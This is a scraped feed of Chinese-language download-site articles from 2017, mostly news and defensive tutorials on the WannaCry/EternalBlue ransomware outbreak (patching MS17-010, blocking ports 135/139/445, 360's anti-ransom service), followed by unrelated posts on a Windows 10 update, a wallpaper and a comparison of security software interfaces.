pluginspage="//www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"/><br/></p><p><strong>多所高校發布風險提醒</strong></p><p>據悉,昨日中國有高校也出現感染情況,眾多師生的電腦文件被病毒加密,只有支付贖金才能恢復。據360安全中心分析,此次大規模爆發勒索病毒是由NSA泄漏的“永恒之藍”黑客工具包傳播的,黑客使用NSA泄漏的黑客工具包攻擊Windows漏洞,把ONION、WNCRY等勒索病毒在校園網快速傳播感染,而“永恒之藍”可遠程攻擊Windows的445端口(文件共享),如果系統沒有安裝今年3月的微軟補丁,無需用戶任何操作,只要開機上網,“永恒之藍”就能在電腦里執行任意代碼,植入勒索病毒等惡意程序。</p><p>昨日,包括中山大學、南開大學、山東大學、西安電子科技大學以及貴州大學等多所國內高校已經發布了關于防范勒索軟件病毒的緊急通知。</p><p>勒索金額高達5萬多元</p><p>據悉,目前“永恒之藍”傳播的勒索病毒以ONION和WNCRY兩個家族為主,受害機器的磁盤文件會被篡改為相應的后綴,圖片、文檔、視頻、壓縮包等各類資料都無法正常打開,只有支付贖金才能解密恢復。這兩類勒索病毒,勒索金額分別是5個比特幣和300美元,折合人民幣分別為5萬多元和2000多元。</p><p>360安全工程師針對校園網勒索病毒事件的監測數據顯示,國內首先出現的是ONION病毒,平均每小時攻擊約200次,夜間高峰期達到每小時1000多次;WNCRY勒索病毒則是5月12日下午新出現的全球性攻擊,并在中國的校園網迅速擴散,夜間高峰期每小時攻擊約4000次。</p><p><strong>個人用戶不必過于驚慌</strong></p><p>個人電腦用戶面臨的風險有多大?360首席安全工程師鄭文彬昨日接受廣州日報全媒體記者采訪時表示,由于以前國內多次爆發利用445端口傳播的病毒,部分運營商已經對個人用戶封掉445端口,因此個人用戶不必過于驚慌。當下,建議個人電腦用戶先對自己的電腦操作系統進行升級。據悉,由于教育網沒有封掉445端口,仍然存在大量暴露445端口的機器,因此存在被攻擊風險。</p><p>記者體驗:</p><p><strong>一鍵修復漏洞</strong></p><p>據悉,針對NSA黑客武器利用的Windows系統漏洞,微軟在今年3月已發布補丁修復。鄭文彬表示,此前360安全中心也已推出“NSA武器庫免疫工具”,能夠一鍵檢測修復NSA黑客武器攻擊的漏洞;而對WindowsXP、Windows2003等已經停止更新的系統,360推出的免疫工具可以關閉漏洞利用的端口,防止電腦被NSA黑客武器植入勒索病毒等惡意程序。記者昨日使用“NSA武器庫免疫工具”對自己的電腦系統進行檢測,發現電腦存多個漏洞,但在使用“NSA武器庫免疫工具”進行修復之后,立即就顯示漏洞已經被修補。</p> [防護教程]360安全衛士怎么解決比特幣勒索病毒 比特幣勒索病毒二種解決辦法分享 http://www.pirinnaturalssoapandspa.com//html/153848_1.html 西西 防護教程 2017/5/13 11:32:03 <p>比特幣勒索病毒大面積爆發,很多小伙伴很擔心會出現問題?;蛘哂械男』锇殡娔X已經出現這樣類似的問題,因此想要知道怎么解決,就讓小編給大家詳細的講講吧。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/14946467458065138.png"/></p><p><strong>比特幣勒索病毒二種解決辦法分享</strong></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/14946467536660536.png"/></p><p><span style="color: rgb(192, 0, 0);">方案一:</span></p><p>1、為計算機安裝最新的安全補丁,微軟已發布補丁MS17-010修復了“永恒之藍”攻擊的系統漏洞,請盡快安裝此安全補丁,網址為https://technet.microsoft.com/zh-cn/library/security/MS17-010;對于windows XP、2003等微軟已不再提供安全更新的機器,可使用360“NSA武器庫免疫工具”檢測系統是否存在漏洞,并關閉受到漏洞影響的端口,可以避免遭到勒索軟件等病毒的侵害。免疫工具下載地址:http://dl.360safe.com/nsa/nsatool.exe。</p><p>2、<a href="http://www.pirinnaturalssoapandspa.com/html/153873_1.html" target="_blank">關閉445、135、137、138、139端口</a>,關閉網絡共享。</p><p>3、強化網絡安全意識:不明鏈接不要點擊,不明文件不要下載,不明郵件不要打開……</p><p>4、盡快(今后定期)備份自己電腦中的重要文件資料到移動硬盤、U盤,備份完后脫機保存該磁盤。</p><p>5、建議仍在使用windows xp,windows 2003操作系統的用戶盡快升級到window 7/windows 10,或windows 2008/2012/2016操作系統。</p><p><span style="color: rgb(192, 0, 0);">方案二:</span></p><p>目前,360國內首家推出了360反勒索服務</p><p>針對目前流行的使用非對稱加密的特定木馬家族,提供文檔還原解密服務。</p><p>為您服務的可都是360頂級的反病毒專家,牛不牛吧</p><p>那還不快來開啟服務,拯救您的文檔,就在此刻</p><p>只要下載安裝最新安全衛士11.0Beta版,點擊主界面中 “反勒索服務”</p><p>在界面中,開啟反勒索服務。開啟成功后,若您不幸遭遇敲詐者木馬,同時360未及時給您進行風險提示,360將幫您支付最高3比特幣的贖金,并全力幫您恢復被加密文檔</p><p><span style="font-size: 18px;"><strong>360安全衛士11.0最新版下載:<a href="http://dl2.360safe.com/partner/Inst13__3112298__3f7372633d6c6d266c733d6e33646634333330323962__68616f2e3336302e636e__0c66.exe" target="_blank">360官網下載地址</a></strong></span></p> [防護教程]中了比特幣勒索病毒怎么辦 比特幣勒索病毒解決辦法介紹 http://www.pirinnaturalssoapandspa.com//html/153841_1.html 西西 防護教程 2017/5/13 10:49:12 <p>比特幣勒索病毒是現在廣泛傳播,很多小伙伴都擔心自己的電腦中毒,不知道自己該怎么進行解決,因此不知道的小伙伴,就讓小編給大家詳細的講講吧。</p><p align="center"><img src="https://pic.cr173.com/up/2017-5/14946462493520643.png"/></p><p><strong>比特幣勒索病毒解決辦法介紹</strong></p><p>目前,360國內首家推出了360反勒索服務</p><p>針對目前流行的使用非對稱加密的特定木馬家族,提供文檔還原解密服務。</p><p>為您服務的可都是360頂級的反病毒專家,牛不牛吧</p><p>那還不快來開啟服務,拯救您的文檔,就在此刻</p><p>只要下載安裝最新安全衛士11.0Beta版,點擊主界面中 “反勒索服務”</p><p>在界面中,開啟反勒索服務。開啟成功后,若您不幸遭遇敲詐者木馬,同時360未及時給您進行風險提示,360將幫您支付最高3比特幣的贖金,并全力幫您恢復被加密文檔</p> [系統安全]如何關閉135/445/139等端口 win關閉135/445/139端口教程【圖文】 http://www.pirinnaturalssoapandspa.com//html/153774_1.html 西西 系統安全 2017/5/13 9:30:12 <p>電腦中有一些端口非常容易被懷惡意的黑客利用導入病毒,近日不少用戶中了比特幣勒索病毒,那么win7如何關閉135/445/139等危險端口,下面就是關閉135/445/139等端口的方法教程,希望對大家有幫助。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/201705130935018360807.png"/></p><h3><span style="color: rgb(255, 0, 0);">Win7關閉135/445/139端口方法</span></h3><p>在“開始”菜單選擇“運行”,輸入“gpedit.msc”后回車,打開本地組策略編輯器。依次展開“計算機配置---windows設置---安全設置---ip安全策略,在 本地計算機”。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334595778.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334511123.png"/></p><p>以關閉135端口為例(其他端口操作相同):在本地組策略編輯器右邊空白處 右鍵單擊鼠標,選擇“創建IP安全策略”,彈出IP安全策略向導對話框,單擊下一步;在出現的對話框中的名稱處寫“關閉端口”(可隨意填寫),點擊下一步;對話框中的“激活默認響應規則”選項不要勾選,然后單擊下一步;勾選“編輯屬性”,單擊完成。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334555991.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334618577.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334612705.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334651964.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334623658.png"/></p><p>在出現的“關閉端口 屬性”對話框中,選擇“規則”選項卡,去掉“使用 添加向導”前邊的勾后,單擊“添加”按鈕。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334674135.png"/></p><p>在彈出的“新規則 屬性”對話框中,選擇“IP篩選器列表”選項卡,單擊左下角的“添加”。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334645828.png"/></p><p>出現添加對話框,名稱出填“封端口”(可隨意填寫),去掉“使用 添加向導”前邊的勾后,單擊右邊的“添加”按鈕。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334714023.png"/></p><p>在出現的“IP篩選器 屬性”對話框中,選擇“地址”選項卡,“源地址”選擇“任何”,“目標地址”選擇“我的IP地址”;&nbsp;&nbsp; 選擇“協議”選項卡,各項設置如圖片中所示。設置好后點擊“確定”。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334758891.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334724976.png"/></p><p>返回到“ip篩選器列表”,點擊“確定”。返回到“新規則 屬性”對話框。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334740334.png"/></p><p>在ip篩選器列表中選擇剛才添加的“封端口”,然后選擇“篩選器操作”選項卡,去掉“使用 添加向導”前面的勾,單擊“添加”按鈕。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334752755.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334773721.png"/></p><p>在“篩選器操作 屬性”中,選擇“安全方法”選項卡,選擇“阻止”選項;在“常規”選項卡中,對該操作命名,點確定。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334728589.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334892393.png"/></p><p>選中剛才新建的“新建1”,單擊關閉,返回到“關閉端口 屬性“對話框,確認“IP安全規則”中 封端口 規則被選中后,單擊 確定。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334841652.png"/></p><p>在組策略編輯器中,可以看到剛才新建的“關閉端口”規則,選中它并單擊鼠標右鍵,選擇“分配”選項,使該規則開始應用,完成。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334886520.png"/></p> [病毒漏洞]比特幣病毒怎么破解 中了比特幣病毒怎么辦 http://www.pirinnaturalssoapandspa.com//html/153767_1.html 西西 病毒漏洞 2017/5/13 9:15:34 <p>比特幣病毒最近在國內高高校瘋狂傳播,不少師生中了比特幣病毒,導致電腦被鎖。比特幣病毒要怎么破解,中了比特幣病毒怎么辦,下面就和西西一起來看看吧!</p><p align="center"><img src="https://pic.cr173.com/up/2017-5/201705130919186866255.png"/></p><h3>比特幣病毒是什么</h3><p>據百度百科,比特幣敲詐病毒(CTB-Locker)最早在2015年初傳入中國,隨后出現爆發式傳播。該病毒通過遠程加密用戶電腦文件,從而向用戶勒索贖金,用戶只能在支付贖金后才能打開文件。</p><p>其最新變種的敲詐金額為3個比特幣,約合人民幣6000余元。該病毒通過偽裝成郵件附件,一旦受害者點擊運行,就會彈出類似“訂單詳情”的英文文檔。這時病毒已經在系統后臺悄悄運行,并將在10分鐘后開始發作。</p><h3>比特幣病毒怎么破解</h3><p>目前并無有效的解決辦法,只能重裝系統,但受感染的文件無法恢復。</p><p>1.數據備份和恢復措施是發生被勒索事件挽回損失的重要工作。建議各位老師及時對重要文件數據做好異地備份或云備份,以防感染病毒造成損失。</p><p>2.確保所使用電腦防火墻處于打開狀態。</p><p>3.不要輕易打開不明郵件或鏈接。</p><h3>預防比特幣病毒方法</h3><p>1、為計算機安裝最新的安全補丁,微軟已發布補丁MS17-010修復了“永恒之藍”攻擊的系統漏洞,請盡快安裝此安全補丁,網址為https://technet.microsoft.com/zh-cn/library/security/MS17-010。</p><p>2、關閉445、135、137、138、139端口,關閉網絡共享。</p><p>3、強化網絡安全意識:不明鏈接不要點擊,不明文件不要下載,不明郵件不要打開。 ??</p><p>4、盡快(今后定期)備份自己電腦中的重要文件資料到移動硬盤、U盤,備份完后脫機保存該磁盤。</p><p>5、建議仍在使用windows xp, windows 2003操作系統的用戶盡快升級到 window 7/windows 10,或 windows 2008/2012/2016操作系統。</p><p>6、安裝正版操作系統、Office軟件等。</p> [系統安全]win10創意者更新怎么安裝 為什么手動安裝Win10創意者更新后果嚴重 http://www.pirinnaturalssoapandspa.com//html/150329_1.html 西西小熊 系統安全 2017/4/27 8:27:07 <p><strong>win10創意者</strong>更新怎么安裝?為什么手動安裝Win10創意者更新后果嚴重?微軟:不要手動安裝Win10創意者更新,這是為什么呢?一起來看看來win10創意者更新怎么安裝?為什么手動安裝Win10創意者更新后果嚴重?</p><p>對于那些還沒有更新Win10.3的用戶來說,微軟今天在其博客中發出通告,一定不要手動安裝創意者更新,而是等待系統自動推送,否則出現的很麻煩的情況。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-10/2019102417470443884.jpg"/></p><p>微軟John Cable表示,第一階段創意者更新只推送給一些微軟較新的設備,他們希望通過最新的配置來充分運行操作系統,根據反饋消息來決定下一個階段的推送。</p><p>當然微軟并沒有強制制止用戶手動升級創意者更新,但他們也明確表示了,如果強行升級就要做好面對可能出現一些無法解決之問題的準備,后果很嚴重。</p><p>John Cable指出,微軟會根據對用戶的影響程度來決定要阻止的內容。在解決問題的時候,他們希望限制出現該問題的客戶數量。比如反饋過程確定了使用特定系列的PC無法完成藍牙附件連接的問題,一旦確定變將此問題發布到Windows社區論壇,提供用戶故障排除指導,并阻止其他設備使用這些特定藍牙無線電更新。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-10/2019102417470489016.png"/></p> [網絡安全]達康書記鎖屏壁紙分享 達康書記鎖屏壁紙高清版原圖 http://www.pirinnaturalssoapandspa.com//html/145338_1.html 西西 網絡安全 2017/4/11 14:26:55 <p>達康書記鎖屏壁紙分享,達康書記鎖屏壁紙高清版原圖。人民的名義正在熱播中,背鍋俠達康書記火啦,網友還制作了達康書記鎖屏壁紙,可以用來時時督促自己,不少小伙伴都在求原圖呢,西西小編為大家分享達康書記鎖屏壁紙高清版原圖。</p><p><strong>達康書記鎖屏軟件下載:</strong><a href="http://www.pirinnaturalssoapandspa.com/soft/458369.html" _src="http://www.pirinnaturalssoapandspa.com/soft/458369.html"><strong>http://www.pirinnaturalssoapandspa.com/soft/458369.html</strong></a></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-4/201704111452043997861.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-4/20174111437532058.jpg" alt="達康書記鎖屏軟件 官方版"/></p><p><span style="color: rgb(255, 0, 0);"><strong>達康書記鎖屏壁紙高清版原圖</strong></span></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-4/201704111439536313368.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>達康書記怎么火了</strong></span></p><p>這位巨火的“達康書記”就是當下大熱的反腐劇《人民的名義》 中一個角色。</p><p>一開始,觀眾都以為達康書記“有問題”,他一定就是幕后黑手大boss??墒沁@幾天隨著劇情的發展,網友發現達康書記,他其實只是個“耿直boy”,一個剛正不阿、廉潔奉公的好領導!</p><p>達康書記在戲里的處境就是——</p><p>壞人 壞人 壞人 壞人 壞人</p><p>壞人 壞人 壞人 壞人 壞人</p><p>壞人 壞人達康壞人 壞人</p><p>壞人 壞人 壞人 壞人 壞人</p><p>壞人 壞人 壞人 壞人 壞人</p><p>上要幫前任擦屁股,下要對付下屬欺瞞,左右提防同僚踩,內里還得小心妻子挖坑。</p><p><strong>網友戲稱他為“填坑專業戶”、“天生背鍋俠”。</strong></p><p>萬萬沒想到,《人民的名義》熱播,最先火起來的不是顏值擔當陸毅,不是演技爆表的侯勇,而是達康書記。</p> [安全產品]360安全衛士、QQ電腦管家、金山衛士,從功能完整、易用性、安全等角度來說,哪一款電腦管理軟件最好?為什么? http://www.pirinnaturalssoapandspa.com//html/132029_1.html 王敏軍 安全產品 2017/2/17 19:09:35 <p>360安全衛士、QQ電腦管家、金山衛士,從功能完整、易用性、安全等角度來說,哪一款電腦管理軟件最好?為什么?</p><p>又是一年開學了,很多返校的同學們有些可能配了新電,有些可能要重裝系統,一般小白用戶裝好新系統后第一件事就是安裝殺毒軟件。</p><p>那到底安裝哪一款安全軟件好呢,西西小編現在找了一些資料來簡單介紹一下國內幾個常用的免費安全軟件哪一個好。</p><p>第一名肯定是 <a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" target="_self">360安全衛士</a>,國內PC占用現在因該在 60-70%之間;下載地址:<a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" _src="http://www.pirinnaturalssoapandspa.com/soft/3188.html">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a>&nbsp;</p><p>第二個當然是 騰迅的后起之秀 <a href="http://www.pirinnaturalssoapandspa.com/soft/36664.html" target="_self">QQ電腦管家</a> 下載地址:<a href="http://www.pirinnaturalssoapandspa.com/soft/36664.html" _src="http://www.pirinnaturalssoapandspa.com/soft/36664.html">http://www.pirinnaturalssoapandspa.com/soft/36664.html</a>&nbsp;</p><p>第三個 老版的金出的 <a href="http://www.pirinnaturalssoapandspa.com/soft/8437.html" target="_self">金山衛士</a> ,當然金山我們還可以選擇 <a href="http://www.pirinnaturalssoapandspa.com/soft/47908.html" target="_self">金山毒霸</a>&nbsp;</p><p><br/></p><p><img src="https://pic.cr173.com/up/2017-2/14873282126704206.png" title="2017-02-17_184343.png"/></p><p>金山衛士和360安全衛士是兩款非常類似的產品,擁有查殺木馬,清理插件,修復漏洞,電腦體檢等多種功能,旨在為用戶使用個人電腦時提供一種安全保障。下面主要就產品的<strong>交互設計</strong>來談談兩者。</p><p><br/><strong> &nbsp; &nbsp; &nbsp; </strong><strong> </strong><strong>一,導航</strong> &nbsp;<strong> </strong>導航的設計是交互中很重要的環節,良好的導航設計有助于用戶準確的完成目標任務。</p><p>1<strong>,</strong><strong>首頁上兩者的主導航</strong><br/><strong><br/></strong><br/><strong><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441337823.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;640&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;81&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;640&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/825a36c49098e185e0f9bff65fe63856_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441337823.jpg" data-rawwidth="640" data-rawheight="81" class="origin_image zh-lightbox-thumb lazy" width="640" data-original="https://pic3.zhimg.com/825a36c49098e185e0f9bff65fe63856_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441337823.jpg"/><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441497899.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;659&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;107&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;659&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/b265c84392e3a0790a2aaded9dfff608_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441497899.jpg" data-rawwidth="659" data-rawheight="107" class="origin_image zh-lightbox-thumb lazy" width="659" data-original="https://pic1.zhimg.com/b265c84392e3a0790a2aaded9dfff608_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441497899.jpg"/></strong><br/>兩者首頁的主導航(結構導航)相差無幾,以最快速的方式讓用戶了解了整個產品大概有什么功能。唯一的不同點便是金山衛士將<strong>清理插件</strong>和<strong>系統修復</strong>放在了<strong>查殺木馬</strong>下的二級導航,作為局部導航用。</p><p><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441424725.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;296&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;38&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;content_image&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;296&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441424725.jpg" data-rawwidth="296" data-rawheight="38" class="content_image lazy" width="296" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441424725.jpg"/><br/></p><p>2<strong>,</strong><strong>垃圾清理頁面的局部導航設計</strong></p><p>這是360安全衛士的局部導航設計:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441430333.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;440&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;40&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;440&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/f3ad0d267e99ec94ababe449d81af852_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;這是金山衛士的局部導航設計:</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441430333.jpg" data-rawwidth="440" data-rawheight="40" class="origin_image zh-lightbox-thumb lazy" width="440" data-original="https://pic3.zhimg.com/f3ad0d267e99ec94ababe449d81af852_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441430333.jpg"/>這是金山衛士的局部導航設計:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441435942.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;279&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;39&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;content_image&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;279&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441435942.jpg" data-rawwidth="279" data-rawheight="39" class="content_image lazy" width="279" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441435942.jpg"/><br/></p><p>兩者的差別就在于<strong>一鍵清理</strong>上,360安全衛士在局部導航的設計時增加了一項“<strong>一鍵清理”,</strong>并且設為默認項,看似沒有什么,實際上意義卻很大。就像周總說的,在使用產品的時候有大量的三低用戶,我們在設計產品的時候必須考慮到他們”對計算機不熟悉,對互聯網不了解,只是當一個工具在用“的情況,比如說在垃圾清理頁面中,像金山那樣直接進入清理垃圾的頁面,里面立刻會呈現出一堆什么windows系統產生的垃圾,媒體軟件產生的垃圾等等,需要用戶自定義的去勾選進行清理,這在一定程度上增加了用戶的操作困難度(尤其是對大量三低用戶,對基本的互聯網概念和操作不知所云,遇到這種情況會覺得很困惑)。而360推出的<strong>一鍵清理</strong>就解決了這個問題,用戶進去垃圾清理清理的頁面,呈現在眼前的就是一鍵清理,<strong>只需一步就能完成,不需要有什么知識背景,簡單快速,降低了用戶的操作門檻,同時減少交互流程,有效的降低了用戶的流失率</strong>。(當然,由于有點互聯網知識背景或使用經驗的用戶更希望去自定義的清理,以避免一鍵清理帶來的誤操作)</p><p>3<strong>, &nbsp;</strong><strong>軟件管家中的導航設計</strong></p><p>先看看360軟件管家的導航設計:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441441551.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;912&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;664&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;912&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/38db1d109010a53fb36baaa8b90ece1a_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441441551.jpg" data-rawwidth="912" data-rawheight="664" class="origin_image zh-lightbox-thumb lazy" width="912" data-original="https://pic3.zhimg.com/38db1d109010a53fb36baaa8b90ece1a_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441441551.jpg"/><br/>我們可以看出,360軟件管家的面板分為三部分,上面的導航欄,左側欄和中間的主體部分。我暫且把這三部分稱為top,left,和main。top中實際上就是結構導航(也叫全局導航),left中是二級局部導航(旨在為用戶提供最方便的快捷操作),main中的上面部分是三級結構導航。這樣做的好處就是信息分類明確詳細,很好的引導用戶進行操作,不好的一面就是導航項太多而導致看起來很混亂,而且交互流程的層級變多,違背了交互中盡量減少交互流程的原則(我們說在交互設計中盡量對流程做減法,多一個流程就會流失一部分用戶)。比如我要在軟件管家中找華語音樂,那么我得首先在top中找到軟件寶庫,然后在left中找到音樂,然后在main的上面找到歌手中的華語音樂,如下圖所示,這樣的交互流程未免太繁瑣了。<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441452768.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;683&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;419&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;683&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/9378a27be4e01bf08d8127d5892d30b4_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441452768.jpg" data-rawwidth="683" data-rawheight="419" class="origin_image zh-lightbox-thumb lazy" width="683" data-original="https://pic1.zhimg.com/9378a27be4e01bf08d8127d5892d30b4_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441452768.jpg"/></p><p><strong>總的來說,360軟件管家的導航這樣設計的優缺點各有,交互設計實際上就是一種目標導向設計,交互設計的目的就是讓用戶更加方便簡潔迅速的去完成產品目標任務。而在這其中,導航分類詳細了難免就會導致導航項過多,交互流程的層級增加,怎樣在這兩者之間尋找平衡,將是一門很大的學問。</strong></p><p><br/></p><p><strong>與360軟件管家相比,金山軟件管家的導航設計就相對簡單了不少,有圖有真相:</strong></p><p><strong><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441421789.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;847&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;595&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;847&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic2.zhimg.com/bd1b854c37d472efa865b97ee3af149d_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441421789.jpg" data-rawwidth="847" data-rawheight="595" class="origin_image zh-lightbox-thumb lazy" width="847" data-original="https://pic2.zhimg.com/bd1b854c37d472efa865b97ee3af149d_r.jpg" 